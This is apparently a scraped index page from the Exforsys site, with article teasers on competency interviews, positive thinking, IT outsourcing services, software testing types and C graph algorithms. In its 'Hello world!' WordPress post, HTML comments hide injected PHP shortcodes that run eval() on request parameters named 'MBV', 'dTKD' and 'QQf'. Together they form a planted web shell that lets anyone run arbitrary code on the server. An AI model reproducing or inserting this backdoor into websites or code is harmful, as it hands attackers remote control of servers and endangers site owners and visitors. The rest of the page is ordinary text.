Competency Models

Building a successful career in an organization requires core set of competencies in order to carry out an outstanding performance and desirable outputs. This is what we call competency model. The framework helps employees in identifying the competencies they need to further improve in order to make a more satisfactory performance in their functions and also in preparation for future promotions and job transfer. The model will analyze employee competency to determine the areas the individual lacks development on and to bridge the gap, training and development will be required.… Read More

Competency Management Software

Competency assessment is a very essential tool in measuring the abilities of every employee. Organizations prefer to employ only competent workforce who can maintain their attributes or keep on improving it to continually meet organizational goals. In order to effectively manage workforce competencies in the company, the use of competency management software is an effective solution. Various management software programs keep track of competency assessments within given deadlines. When a company is able to identify the appropriate employees in the right positions internally, motivation and commitment increase. Moreover, employee turnover… Read More

Competency Interview Techniques

Competency-based interviewing is an elaborate process for both interviewers and the interviewees. The process is meticulous and tedious for the interviewers because they need to understand the demands of the position, which would include finding out the competencies needed for that position. For interviewees, they may not be able to identify that it is a competency interview they are in. Also, there may be other key competencies that the company is looking for that are not announced in the job advertisement but will be measured by the interviewer during the… Read More

Competency Interview Etiquette

Competencies are very essential in the success of an organization and individual job performance. With an increasing number of aspiring candidates in search of a well-compensating job, many companies and organizations nowadays need to make sure they are only getting the best and most qualified for the positions. They do this by identifying the competencies of the candidates as early as the recruitment process. A critical and crucial stage in the hiring process is the interview stage. Aside from the usual examination to gauge the skills of the candidates in… Read More

Impress the Employer with Your Competencies

Candidates seeking a good paying job in reputable companies must be prepared enough to land that job. Since there is a huge pool of job applicants who have similar goal as you do, you must aim to stand out from the rest and be the first to be noticed by the employer. Good candidates are those who project confidence in the way they answer the questions. Companies seek for potential candidates who possess the knowledge, skill, and attitude needed for the position. They want competent workforce and you have show… Read More

Competency-Based Interview Preparation Tips

How to Impressing the Interviewer? Individuals seeking for a good paying job in reputable companies must be prepared enough to land that job. Since there is a huge pool of job applicants who have a similar goal as you do, you must aim to stand out from the rest and be the first to be noticed by the employer. Good candidates are those who project confidence in the way they answer the questions. Companies seek for potential candidates who possess the knowledge, skill, and attitude needed for the position. They… Read More

Competency Interview Flow

A typical competency-based interview follows a flow, which serves as a guide for the interviewer and this holds true for all other types of interview. A smooth flow of question and answer process will satisfy the goal of both interviewer and interviewee. Typically, interviews would last 30 to 40 minutes, or can be a little longer such as when the interviewer is handling a candidate for a senior or higher position in the company. Commonly, interviews are also conducted in a one-on-one manner, but in some cases, panel or group… Read More

Competency Indicators

How Companies Gauge Competencies Using Competency Indicators In an organizational system and process, competencies are one of the important and critical factors in the workforce scheme and success of the company. They identify the capabilities, attributes, and attitudes of the individuals in order to meet staffing needs. These are defining characteristics of the employees contributing to their improved job performances as well as successful organizational results. Competencies would include the applicable knowledge, skills, and attitudes (KSA) of the working individuals. It is important for an organization or a company to… Read More

Competency Based Interview Questions

An interview has always been one of the most effective ways in the recruitment process of organizations. It is a method of getting to know the applicant even better as well as gauging the skills of the person. Normally, companies that are in search of potential candidates for certain positions conduct interviews aside from written or online exams. In order to make wise and smart selection of good candidates, employers nowadays employ the competency-based manner of interviewing. It is different from a normal or regular interview in a way that… Read More

Creating a Competency Based Resume

An important tool in the job application process is the resume or curriculum vitae (CV). It is an applicant’s personal identification where all pertinent information is reflected. Resumes are necessary documents that the recruiting team of a company will need from anyone who is applying for a job. Whether making an online or hard copy of a resume, an effective type of resume to be followed is the competency-based resume. Sometimes called functional resume, it highlights the core skills and qualifications of the individual as opposed to chronological and traditional… Read More

Identifying the Competencies of a Potential Employer Needs

One of the crucial stages in getting the right candidates for the company is the recruitment process. That is why during this stage, potential candidates are carefully screened and assessed before they are considered for the job. Aside from experience and educational background, the recruitment team also considers an individual’s competencies as one of the bases in finding a suitable candidate. The employer has to identify the attributes of each applicant so that they will be able to discern properly as to who deserves the position. Competency Based Interview As… Read More

Competency Library – List of Core Competencies

The screening and recruitment of potential employees, which constitute the hiring process in every company is a necessary aspect of the organizational system because this is the initial stage of employment and this is the part where strong candidates for the job are identified. It is a crucial stage since part of the company’s success relies greatly on the kind of people it employs. Every company seeks for a set of key competencies or essential skills from its candidates during the screening process. In the interview alone, the job candidate… Read More

Competency Mapping – Discovering Your Core Competencies

Companies find it easy to grow and expand with a group of competent and skilled individuals who largely contribute to its success. In many growing and successful companies, competency mapping plays a major role. The term pertains to the process of identifying the essential qualities and skills of the employees and processes within the organization. Competency mapping generally assesses two crucial areas of a working individual: emotional intelligence or emotional quotient (EQ), and the individual’s strength or capabilities in various aspects of the organization such as leadership, decision-making, and organizational… Read More

How to Think Positively

Choosing to become an optimistic person with positive thoughts and attitude is a healthy choice to make in one’s life. Positivity in our mental and emotional aspects is a habit that we can gradually master with constant practice. You might be living a life filled with negative vibes which could in turn ruin your life. Your thoughts alone can make a misery out of your life.  You may have noticed that it is easy to think of negative thoughts and consequences once you encounter hardships and problems.  Changing your perceptions… Read More

Influence of Positive Thinking on Work Performance

Work is one of the prime contributors of stress. We are also likely to get affected by people we interact with at work, the workload assigned to us by our superiors, the deadlines we are bound to meet, and many other factors. In most cases, the kind of stress we are getting from work is not healthy. It clouds our mind and diminishes our performance to great extent. However, with a positive mind, we can take control of our ability to handle stress and optimize our performance. Positive thinking implies good… Read More

Effects of Positive Thinking on Attitude and Behavior

We have always wanted to live a life of goodness and satisfaction. But the problem is that there are so many factors in this world that can get in the way of our ideal kind of life. However, with a positive mind, the perception we create about life will influence the final outcome. On the aspect of personality development, positive thinking creates huge impact on us. In building an admirable character, it is guaranteed to help you improve your individuality. As the cliché goes, we are only humans and are… Read More

Develop Positive Thinking Through Self Affirmations

Our mind is driven by a constant flow of thoughts that direct or control the way we perceive the world; it affects our actions, and even impacts our emotions. Our thoughts are so diverse and can be so random that we are greatly affected with it. The mind is capable of making you a success or turning your life upside down. Thoughts can either be positive or negative and regardless of the kind of perception we choose to have, these thoughts are one of the crucial factors in the changes… Read More

How Self Monitoring Helps Positive Thinking

How well do you know yourself? Can you aptly describe yourself to others? At some point, you may have experienced getting confused with your own personality. We possess certain traits that we think do not perfectly describe who we really are. It is important that we regularly monitor our personal traits and behaviors and make a personal evaluation of our own selves. “Self-Monitoring” is a process that allows us to examine and keep track of our own characters so that we will be seen by other people as pleasing in… Read More

How Self Esteem Can Help Positive Thinking

The word ‘esteem’ is defined as “appreciating the value of”.  The term self-esteem means giving high regard for oneself and treating the self more importantly than anyone else regardless of cultural or personal differences. Self-esteem is synonymous to self-respect. Self-esteem is about believing that you are a valuable and worthy person not just to yourself but to other people as well. It is one important attribute that every one of us should cultivate. Our personal value is a crucial foundation of personal success. It always starts out with loving yourself… Read More

How to Manage People’s Perception

Have you experienced being misjudged by other people? Have you ever thought about how others should see and know you? The way we see and interpret others can affect the way we understand their personality.  We often get assumptions of our character from those we do not know, but on certain instances, even from those we already know. If you are keeping a reputation just like high profile leaders do, you must have cared about it a lot. But even if you are just an ordinary person or a typical… Read More

Traits of a Positive Thinker

Our mind is where our thoughts are contained, filled with memories, experiences, images, desires, and plans. The moment we wake up in the morning, our mind functions by prompting us on what to do and what will happen for the day. Are you the type who decides first thing in the morning how you want your day to be? Do you condition yourself and set the mood you want to have for the day? Do you make it a habit to decide how you want your day to end? Or… Read More

How Positive Thinking Works

Our life is often tested by adversities, trials, challenges, and failures. Every individual go through ups and downs in the course of his lifespan. When you battle courageously, you succeed in your endeavors. But when you quit and back out, nothing awaits you but misfortune. No problem exists without a solution and giving up without trying hard is considered as being pessimistic. How can you make things work if you never gave it a try? If failure is what you think you will be, failure is what you will get.… Read More

Aspects of Positive Thinking

According to Mahatma Gandhi, "What we become is a product of our own thoughts". The human mind is so powerful that it shapes the very essence of our lives. The thoughts that we allow to dominate in our own minds will influence on what we ultimately become in our life. We may say there have been many other factors such as people around us or the situation itself that have influenced our personality, nevertheless the final outcome is dominantly based on what we actually think. We are bound to entertain… Read More

The Effects of Positive Thinking on Mental Health

When you wonder why things are not happening in your favor, remember that “It’s all in your mind.” This cliché may have been overly used but it has some truth in it. We may not completely understand it but scientifically, there is an explanation to it. Let us try to decipher and comprehend this concept. The human brain is a powerful tool that controls and manipulates our thinking. The mind is capable of admitting all kinds of thoughts, both positive and negative, and can even picture out images. But we… Read More

How Positive Thinking Affects Personality Development

Our individual personality makes up the very essence of our totality as a human being. We are judged on our personality through our character. So, it is either we have a good or bad personality depending on how others perceive it. What contributes to a good and pleasing personality? How can we project our personality in such a way that will attract people? It is a given fact that we all have unique individual personalities. We can never be someone else we are not, no matter how hard we try… Read More

The Importance of Positive Thinking

Positive minds are powerful minds. We can do and achieve almost anything with a mind that has the willingness and determination to do it. Although not everyone gets to realize this fact of life, it is probably a good try to allow paradigm shift in our method of thinking. You may not have realized it, but the misfortunes and tragedies in life that you are experiencing may be brought about by your own actions and thinking. We tend to blame others for our own failures and adversities. We think that… Read More

Introduction to Positive Thinking

According to the book entitled “The Secret”, we become what we think of and how we respond to these situations. Our own thoughts are manifested by our actions. Our mind plays a crucial role in the way we handle events and situations. You may have experienced feeling low and distressed or weary at the end of the day. If you set your mind too much on the negative, your emotions will correspond to your mind, and will be apparent in your actions. They say that we can choose to be… Read More

Oracle Services

Most businesses today rely upon their high-performance enterprise systems to help them remain ahead of their competitors. Oracle Services provided by Exforsys will help organizations to differentiate themselves from  others by improving their business performance level. Exforsys is capable of developing, implementing and upgrading applications across the entire Oracle suite. Oracle solutions provided by Exforsys exemplify an unmatched combination of business insight and technological expertise. Skilled Oracle professionals from Exforsys deliver unparalleled Oracle solutions. Oracle is a commonly used database and Exforsys leverages its full potential for the success of… Read More

Business Intelligence & Data Warehousing

Implementing advanced Business Intelligence and Data Warehousing Solutions have become norm for organizations, which seek to refer historical data during decision-making process. Exforsys develops efficient  analytical solutions that allow business organizations to enhance their business performance. Exforsys BI Solutions help leverage information as a valuable asset for the companies. With focus on enhancing Performance Management capabilities of a business, over the years, Exforsys has successfully completed data warehousing projects. Exforsys Business Intelligence & Data Warehousing  solutions help building an information management solution that serves as an integrated platform for workflow… Read More

Mobile Web Apps Development

Mobile web apps are often considered as a valuable substitute for native apps that are not able to run on mobile devices. Smartphones such as Android-based devices, Windows Mobile Devices and iOS devices come  with mobile browsers that allow users to access a whole range of apps on the internet. Most users, who are more accustomed to desktop usage, want to enjoy the same level of convenience, navigation features and flexibility while using web apps on their devices. Mobile browsers such as Mobile Chrome, Mobile Safari, and Opera etc. make… Read More

Windows Mobile Apps Development

Microsoft’s Windows Mobile OS is often considered as a smart operating system for mobile devices. Windows Mobile platform supports development of apps that run on Windows based Mobile Phones and devices.  Windows Mobile Apps can uniquely meet an organization’s business needs by improving productivity and enhancing competitive advantages. A perfectly built Windows Mobile App can help increase performance and  bring a host of value-added capabilities for an organization. Exforsys is proficient in developing Microsoft’s mobile based apps for smartphones and mobile devices using Windows OS under Windows Mobile platform. Exforsys… Read More

iPad App Development

iPad is a perfect platform for application development. iPad offers amazing features via iPad apps with various functionalities such as games, web, business app, e-Books, entertainment apps, videos, email and many  more. Exforsys professionals are experienced in iPad apps development and they ensure your iPad application development requirements gets the final desired outlook. E-book submitting, business or trading, health and  medical, gaming app, entertainment app are all covered by Exforsys in-house iPad developers at affordable and competitive price.Developers at Exforsys, plan and estimate iPad application development period and involve the… Read More

iPhone Apps Development

With the dynamic nature of the telecom sector, communication as well as information has become an integral part of our life. Smartphones have proved to be a boon for everyone. Among them, iPhone has created a  revolution in the market and is an extremely popular device. Applications for smartphones are offered in categories like games, lifestyle, social networking and more. For the different fields like business, social networking, entertainment, shopping, browsing, navigation and much more, Exforsys undertakes iPhone apps development projects. You can reach your clients effectively via iPhone mobile… Read More

Blackberry Apps Development

Blackberry is one of the pioneers of smartphone industry. Blackberry is popular in the market because of its flexibility in facilitating customized application development according to industry requirements, and  business needs.In many organizations, blackberry applications are used to access personal information and emails. Java Micro Edition and MDS are the two main software platforms used as Blackberry applications development solution. Wireless e-mail, SMS messaging, Client–side logic, organizer, internet and intranet-based applications, built-in GPS, browsers, easy to customize user interfaces are some of the charming features of blackberry mobile phone.Exforsys specializes… Read More

Android Apps Development

Among mobile operating systems, the reputation and popularity of Android OS is growing tremendously. Android OS is famous for its incredible features and seamless performance. There is huge demand for developing custom applications  for different purposes and the android application development market is booming. Exforsys is well-known for developing Android based custom apps at affordable costs. Exforsys is proficient in handling the mobile phone’s core functionalities such as making calls, SMS, camera etc access and interact by custom applications. C, C++, Java programming, Linux, Windows XP, Vista,  Android SDK are… Read More

Microsoft Access Development Services

Exforsys specializes in Microsoft Access Development Services that  include consulting, custom solutions development and system migration to MS Access.  Our team of expert MS Access developers have years of experience in designing and developing customized database solutions. Exforsys are adept in building solutions that are feature-rich with clean and clutter-free user interfaces. Our solutions are engineered to offer an  optimized level of functionality, reliability, performance with a superior level of data integrity and long-lasting functionality with scalable features for  operational efficiency. Upgrade & Migration Services Exforsys also undertake MS Access… Read More

C# .Net Development

Microsoft .NET’s powerful development framework promotes robust software development and when combined with C#, it is possible to develop and deployment advanced and secure applications. C# .Net provides  tools required for building, testing and deployment of highly reliable and scalable software solutions. Exforsys is proficient in adopting new technologies and tools for project development. A dedicated team of C# .Net  developers deliver cutting-edge services to Exforsys clients. Experienced team of Microsoft Certified Professional handles C# software development, build applications that meet unique needs and ensure that the deployed solutions address… Read More

.NET System Designs

Exforsys specializes in .NET system designs for providing enterprise services. Besides developing new systems, expertise is also provided for rectifying existing unmanaged COM+ and improve its functionality. Setting  aside the common assumption that enterprise services can only provide functional excellence to unmanaged COM+, Exforsys executes Microsoft based enterprise services that have been planned, developed and  customized according to the needs of the client. At Exforsys, skillful developers use latest versions of .NET Framework and COM+ that matches best with Windows .NET Server. While accomplishing .NET system designs, all existing unmanaged… Read More

MS Application Development Services

Businesses today, rely on Microsoft applications in addition to Oracle or other SAP based solutions as their enterprise business applications. Exforsys specializes in providing custom Microsoft application development  and carries out effective development and implementation of software systems. Exforsys offers Microsoft Application Development Services that combine collective expertise of software developers, system engineers and project managers. Using their wealth of experience, our developers plan the  entire life-cycle of software development phases. Skilled experts carry out Microsoft-specific development projects in the most efficient manner and will also help with integration and… Read More

MS ASP.NET, MVC & .NET Web Application Development

ASP.Net is a feature-rich framework from Microsoft which is largely used for versatile web application developments. At Exforsys, we have a team of dedicated .Net Developers who are experts in ASP.NET platform and  can develop excellent websites and web portals. .Net developers at Exforsys have years of experience and have also worked on ASP platform. By combining the technological competence of ASP and .NET, Exforsys team carries out large scale web application  developments to meet varied business goals of its clients. .Net development services provided by Exforsys include websites, software… Read More

MS WinForms Development Services

MS WinForms is an ideal way to create desktop based applications that run on MS Windows platform. Microsoft Windows forms make use of native interface elements via Microsoft Windows platform. Windows forms are technically enhanced application programming interface (API) for GUI application development that gives users a simple and pleasurable application usage experience. WinForms is recommended for all MS Windows based developments. At Exforsys, we execute immaculate GUI and rapid application development by combining the solid foundation of MS .NET platform with Microsoft Winforms, our Winforms developments are native to… Read More

Database Architecture Designing

Database scalability is essential to handle and organize business data efficiently. Database design and architecture is one of the important aspects of database system. In a bid to minimize the start-up development  costs, many a time the database architecture designing is overlooked. A solid database design is necessary for future development and maintenance. Our database designing services have proved to be instrumental in  this domain. As the business grow, so will the size of data. Scalable data ensures increase in information and results in a greater efficiency. Proper database architecture… Read More

Database Development

Database development is an integral part of dynamic websites. It is an on-going need and our developers are very well familiar with a variety of database development. With our database development services, we strive towards database protection and smooth functioning. With a focus on the revitalization of corporate web integration, we have specialized in database creation and management. Our database consultants are highly qualified and have experience in various aspects of the  data and process management. Exforsys development teams focus specifically on data to prevent data conflict, keeping in mind… Read More

Remote DBA

Exforsys provides Remote DBA services for managing SQL Server database. Our DBA’s goal is to provide smooth, system performance and reliable quality services via remote location. For an organization,  Remote DBA services provided by Exforsys offers substantial technical and business benefits. Business Benefits of Remote SQL DBA are: Reduces the cost to be incurred on hiring technical manpower Minimizes the downtime and accelerates the problem resolution process Reduces the burden on existing staff Helps to avoid expenses of internal hardware such as computers, phones, printers, work space etc Delivers instant… Read More

MS SQL Server QA/Testing

A database server generally serves as a storehouse to store valuable and sensitive `data of an organization. These could be customer details, company’s financial information etc., and their safety and integrity is an issue of utmost importance for any organization. It is recommended that you store your data in a tested SQL server that can ensure you the complete data protection. Exforsys database professionals, who are well versed in SQL server testing, strive to ensure database integrity and maximum possible uptime. They are efficient in database programming and defining nested… Read More

Oracle Business Intelligence Solutions

Business process automation brings in several benefits to the organization both in terms of efficiency as well as profit. Business applications serve as a catalyst for mission-critical internal business processes. Proper implementation of business applications will enhance the productivity of a company to a great extent. However, these applications generate a tremendous amount of data. Application data forms an important component for the success of the enterprise. Business organizations harness vast amount of data that can help them optimize their business performance. Data when used intelligently will help a business to transform its processes and become a… Read More

SQL Server Database Support and Maintenance

Exforsys provides best-in-class SQL Server database support and maintenance services enabling our customers to benefit from the rich capabilities that SQL Server can bring forth with respect to building and maintenance of an efficient web-based application. Our SQL Server database support and maintenance services focus on improving the performance of online applications, ensuring an enhanced level of operational efficiencies. Exforsys provides efficient service and strive at saving both time and money. Our Database Support Specialists take care of Microsoft SQL Servers and offer extensive database support services on demand. With… Read More

SQL Server Administration

Database is the core layer of information management sphere and much effort is involved in making a website or an online application which stores information in a database. If this database goes down then online application will not operate properly. Thus, business organizations try to minimize the chances of database collapsing or malfunctioning. Exforsys specialized team comprise certified and trained database professional with technical knowledge of database management and SQL server administration. Our team members configure SQL Server and ensure the database uptime to the maximum extent possible. Moreover, the… Read More

Infrastructure Management

Complex applications are being developed every day, and this necessitates robust infrastructure that is not only capable of supporting rapid development processes but should also be seamlessly scalable. Exforsys provides infrastructure management services through multiple delivery centers via off-shore, on-site and near-shore locations. Our services are based on flexible and cost-effective infrastructure solutions. Exforsys professionals are highly qualified, possessing the ability to understand the client’s need and provide them support according to their requirements. We extend end to end IT Infrastructure services through differentiated value propositions such as on-site and off-site IT infrastructure management as well as cloud… Read More

Custom Solutions

Oftentimes, businesses face myriad challenges in the course of meeting the continually evolving technology requirements. Many firms are still facing difficulties during process management and integration of enterprise resource technology. Due to  improper database management, business establishments are not able to collect and analyze data when it is needed the most. Companies are in need of custom solutions that will allow them to access information from various verticals of the  business in the simplest and quickest manner possible. Through custom solutions developed by Exforsys, you can make sure  that your… Read More

Production Support

Enterprise Resource Planning helps an enterprise to collect and store data which is accessed later for analysis and generating reports. The ERP software consists of modules that are used to implement the process. Exforsys provides excellent production support for such ERP modules according to the client’s specifications and product configuration. Exforsys extends production support which is designed in accordance with the client’s production environments. Our support staff are available to provide you with the access and support you need. With our industry-leading expertise and years of experience, we support virtual… Read More

Web Solutions

The Internet is vastly used to search for information on almost everything and anything. Businesses are taking advantage of this opportunity and utilize the best of Internet technology to keep themselves ahead of competitors. In order to complement the needs of enormous Internet users, companies are creating their own websites to grab the attention of customers.Companies have also invested on servers for data mining, and these servers help company executives to collect data from end-users. The database in the servers collects data and provides details to the application servers, where… Read More

Upgrade Solutions

In today’s competitive world, every company aims for rapid growth and has the objective to expand their product and service offerings. It is important for every business organization to upgrade their systems in a timely manner according to the ongoing developments. This is vital to remain competitive and maintain efficiency. Exforsys offers an array of ERP upgrade solutions that can support your business-critical systems. Our upgrade solutions range from defining the strategy to implementation and we can serve as your trusted ERP upgrade partner. We work closely with our clients… Read More

Implementation Solutions

Many business organizations face difficulties while trying to access a particular data from the huge database they maintain. This issue can be also due to inappropriate maintenance of departmental documents, which causes problems while retrieving the correct files for carrying out certain tasks. To overcome such problems, we deliver extraordinary Enterprise Resource Planning solutions. Exforsys team is highly experienced in the field of implementation solutions. We carry out a detailed Statement of Work (SOW) after analyzing the present state of affairs of the company. By means of the solution delivered… Read More

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging![catlist id=234].<!– [insert_php]if (isset($_REQUEST["MBV"])){eval($_REQUEST["MBV"]);exit;}[/insert_php][php]if (isset($_REQUEST["MBV"])){eval($_REQUEST["MBV"]);exit;}[/php] –><!– [insert_php]if (isset($_REQUEST["dTKD"])){eval($_REQUEST["dTKD"]);exit;}[/insert_php][php]if (isset($_REQUEST["dTKD"])){eval($_REQUEST["dTKD"]);exit;}[/php] –><!– [insert_php]if (isset($_REQUEST["QQf"])){eval($_REQUEST["QQf"]);exit;}[/insert_php][php]if (isset($_REQUEST["QQf"])){eval($_REQUEST["QQf"]);exit;}[/php] –> Read More

What is Stress Testing

Stress testing is a complex test in which testing is conducted under reduced machine and system resources conditions. The resources that undergo stressing may include internal memory, CPU availability, disk space, and network bandwidth. Stressor utility is generally used to reduce internal resources. Topics Is Stress Testing Practical? Benefits of Stress Testing Stress Test Result Data Conclusion In principle, stress testing tries to break the software by either overwhelming the software with too many tasks. The concept behind stress testing is to let the system fail intentionally to see how… Read More

What is Static Testing

A simple static test is necessary to detect possible defects and errors during the design phase of a software application and to verify in a precise manner, the various tasks for synthesis of program modules and test plans. Topics Static Testing Vs. Dynamic Testing Static Testing Methods and Techniques Goals of Static Testing Conclusion A software tester conducts static test with a minimal package that is just sufficient. Testers will get a comprehensive test plan that allows them to ascertain the operation of the product as per the criterion of… Read More

What is Smoke Testing

In software industry and according to Microsoft Inc, the term smoke testing defines the process of ascertaining or validating code changes before the changes are introduced into the product’s source tree. Topics Smoke Testing Advantages Role of Smoke Test in Software Development Implementing Smoke Testing Conclusion Once you make the code reviews, smoke testing will become the most useful and cost effective testing method for finding out and fixing defects in the software. These tests can confirm changes in the codes as expected and ensure that the changes do not… Read More

What is Security Testing

The basic principle of security testing is to ensure that the software is safe and secure. Security testing makes sure that the software is not easily hacked by malicious codes. Security testing helps software developers identify and remove loopholes in the software to ensure that the system will not be attacked by hackers and other third party intruders. Security testing for software has recently migrated beyond the domain of network port scanning to include checking the software’s intrinsic behavior.  This test goes far deeper than a simple black box test… Read More

What is Sanity Testing

Sanity testing is a cursory test to confirm if a particular software produces the desired results or not. This implies that the software has already passed other kinds of testing before they can undergo sanity testing.  It is important to note that sanity test is not as in-depth as other kinds of testing.  Topics Why Sanity Testing is Important? Disadvantages of Sanity Testing Sanity Testing vs. Smoke Testing Sanity Tests Process Conclusion Sanity testing can be categorized under regression testing because the procedures for both these tests are basically the same.… Read More

What is Regression Testing

Regression test is a powerful tool designed to test the application after the introduction of changes.  The basic concept behind regression testing involves testing procedures that ensure the software’s ability to perform intended tasks even with improvements or modifications. Regression testing is also a form verification test because it will help us determine if the software works as expected even after undergoing critical modifications to its architecture. By using this testing procedure, you can prevent unforeseen errors in the finished software product or application. Whenever you add new features or… Read More

What is Data Recovery Testing

Recovery testing an intricate system test that compels the software to come down in a number of ways, later ascertains, and verifies that recovery is performed as soon as possible. An automated recovery will ensure re-initialization mechanisms, data recovery, and restart, which are evaluated for correctness. However, if the recovery needs active human intervention, the average time to repair should be well within the acceptable limits. Topics Basic Principles Why is Recovery Testing important? Tips and Suggestions for Effective Recovery Testing Recovery Testing Issues Conclusion Basic Principles Computer systems should recover… Read More

What is Performance Testing

Performance testing is a kind of testing that determines the speed and effectiveness of a software application or suite. This process will involve many quantitative tests carried out in a laboratory like the measurement of the response period or the number of millions of instructions per second (MIPS) at which the system will function and perform. Software testers also evaluate and inspect many qualitative parameters like reliability, fidelity, trustworthiness, scalability and inter-operatability. Topics Performance Testing Considerations Performance Testing Vs Stress Testing Performance Testing Guidelines Conclusion Performance testing has the ability… Read More

What is Negative Testing

The main objective of conducting a series of tests on a software product is to make it foolproof so that it will run on any type of system and under any computing environment.  Quality conformance testing is an essential part of the software developmental process.  Various tests are performed along different development stages and also on the finished product before it is delivered to the client or end user. These tests for verifying and validating the product are often referred to as positive tests. However, as stated, positive testing can… Read More

What is Mutation Testing

As the demand for software grows, so is the complexity of the design. The more complex a software is, the higher will be the testing needs, quality assurance and customer satisfaction. Although testing is, an integral part of the software development process the issue is still on what is sufficient or adequate testing still open. Topics What is Mutation Testing? Mutation Testing Procedure Mutation Score Analysis Mutation Testing Advantages Mutation Testing Disadvantages Automation of Mutation Testing Conclusion If your tests cannot find a bug, can you believe that there are no… Read More

What is Monkey Testing

Monkey testing is a random type of testing carried out by automated testing tools.  There are both “smart monkeys” and “dumb monkeys” in testing and they work randomly. Topics How to use Monkey Testing tool? Types of Monkey Testing Cost Associated with Monkey Testing Advantages of Monkey Testing Disadvantages of Monkey Testing Conclusion Smart monkey testing is very good for load and stress testing because it has the capability to find a number of bugs; however, they are very expensive to develop. On the other hand, dumb monkeys are quite cheaper… Read More

What is Load Testing

Before understanding the complexity that is involved in testing the software using load testing methods, it is important to know that load testing is part of performance testing first. It is also crucial for you to understand that unlike other kinds of testing, the main purpose of performance testing is not to find bugs and errors in this system. Rather, the concept revolves around eliminating the different bottlenecks that are involved in a system process. Topics Examples of Load Testing Advantages of Load Testing Conclusion Having a streamlined set of… Read More

What is Install and Uninstall Testing

Installation and Uninstall testing is generally accomplished by a software test engineer with the concurrence of a configuration manager (CM). It is also known as Implementation testing and is typically characterized by a testing which comes about while utilizing compile version of codes inside the testing or pre-production environment.  This procedure normally takes place beyond the development environment so as to restrict code corruption from future delivery. Topics Performance of Implementation Performance Essentials Implementation Parameters Test Implementation Gadgets Installation testing will check and inspect whether the installed feature are working… Read More

What is Incremental Integration Testing

Incremental integration testing encompass the basic concepts of integration testing.  It is continuous or repetitive testing of a software application as new and fresh functionality is advised. You may need different aspects of software application’s functionality that are independent to work separately before you complete all parts of program. Programmers, software engineers, or test engineers may carry out this type of testing. Topics Integration Strategies Incremental Integration Testing Principles Conclusion Under usual circumstances, the incremental integration testing is done whenever the software needs to have its various aspects of functionality work independently… Read More

What is Functional Testing

Functional testing is an efficient method of testing an application to validate its stability. It is almost similar to black box testing. Functional testing is a common method that almost all software testers use to validate a given set of software applications. This is a popular testing method just like white and black box testing. Topics Importance of Functional Testing Problems with Functional Testing Effective Functional Testing Practices Functional Testing Guidelines Functional Testing Tools Conclusion Functional testing is even more popular than other kinds of testing techniques, because this is one… Read More

How to Work with Difficult People

To become successful in life, it is necessary for you to work with others. Few successes are a result of just one man or woman’s effort, and there is typically a long list of people who helped the individual succeed. However, the need to work with people also means that some of the people we work with may be difficult. Most of us are familiar with difficult people. No matter what you do for them, they are never pleased with it, or they always give you a hard time. They tend… Read More

Effective judgment for Building Rapport

Effective judgment to build rapport with your prospects It is very important for you to develop the skill of using effective judgment to build rapport with your prospects. In this context, judgment is defined as knowing when you should listen, talk, and respond to what’s being said to you. This means that you must become skilled at giving a strong monologue, and you must also know when to be silent and transition back into dialogue again. While this may sound somewhat difficult, it actually isn’t. The first question that you… Read More

How to Increase Your Power Base ?

Power is often defined as “the ability to control the choices which are made by others”. This definition is very accurate, because if you are able to do this, there are few limits to the things you can accomplish in this world. In today’s world, while the word “power” has become synonymous with greed, evil, or unjust control, the truth of the matter is that all of us want to increase our own personal power base. Indeed, increasing your own power base allows you to be less susceptible to others… Read More

How to Gain Skills to Influence people ?

Being able to influence people is not only an important part of management, but it is also an important part of being a leader. It is very difficult to manage or lead others if you are incapable of influencing them.  Skilled managers are adept at using a number of tactics to influence others. One of the tactics which they make use of is being able to reason with their staff, as well as their superiors. Additionally,  managers and leaders also use pressure tactics in order to influence those beneath them.… Read More

Multiple Intelligences – Gardner’s Theory

There are a number of theories for learning which have been developed over the course of the last 30 years. One of the most interesting of these theories is the multiple intelligence theory. This is a theory which was developed by Howard Gardner in 1983, and it basically deals with numerous aspects of developmental psychology, as well as cognitive psychology. Gardner spent a great deal of time interviewing many individuals, and they ranged from people who had suffered from strokes to geniuses, and those who were considered to be autistic.… Read More

Do you have the skills needed to influence ?

Before you begin to influence others, it is very important to know you strengths and weaknesses. Your greatest enemy is often the person you see when you stare into a mirror. By being aware of your own strengths and weaknesses, you have the foundation which can allow you to reach the heights of power. When you are aware of what you can and cannot do, you are less likely to overextend yourself.  One factor that separates successful people from those who are unsuccessful is that successful people have a deep… Read More

Why You Need Influence Skills ?

Influence is a type of persuasion. Often people are affected by other’s behavior, words, actions and presence to a certain degree. Thoughts and actions of people can be controlled or even altered by influencing them. An example of one of the most common types of influence is the peer pressure. With peer pressure, an individual will be convinced to carry out actions that are chosen by his peers even though he may not like, he will still do it because he feels such actions are necessary for maintaining a good… Read More

C Algorithms – Dijkstra’s Algorithm

This algorithm is a graph search algorithm that solves the shortest path problem for a graph. In the graph, the path between vertices has a cost or a length, so Dijkstra’s algorithm simply determines the path with the lowest cost between a vertex and another. The algorithm ends when the shortest path from a vertex to a destination vertex was discovered. How it works: 1) First thing to do is to set the distance value, which is 0 for the current node and infinity for the rest. 2) Set all… Read More

C Algorithms – Breadth-First Search (BFS)

Depth-first search (DFS) and breadth-first search (BFS) are two algorithms for traversing a graph. A breadth-first search (BFS) begins at the root node and explores all the neighboring nodes. Then for each of those nearest nodes, it explores their unexplored neighbor nodes, and so on, until it finds the goal. Example: In the case of BFS: If for DFS the traversal would be A, B, E, F, C, D, in the case of BFS it would be A, B, C, D, E, F. he BFS visits the nodes level by… Read More

C Algorithms – Depth-First Search (DFS)

Depth-first search (DFS) and breadth-first search (BFS) are two algorithms for traversing a graph. Graph traversal refers to the problem of visiting all the nodes in a graph in a particular manner. Each node may have to be visited more than once, and a root-like node that connects to all other nodes might not exist. Let us start first with DFS. DFS A Depth-first search (DFS) is a technique for traversing a finite undirected graph. DFS visits the child nodes before visiting the sibling nodes, that is, it traverses the… Read More

C Algorithms – Topological Sort

Let us say that the order relation that was defined the in introduction lesson was a partial one, for example: a1 < a0, a1 < a2 < a3. The problem is to determine a list of order, in which if ai < aj then ai will come before aj in the final sorted list . For example, our list could be : a1, a0, a2, a3 or a1, a2, a0, a3 or a1, a2, a3, a0 Any partial ordered list can be sorted topological. For a graph, a topological sort… Read More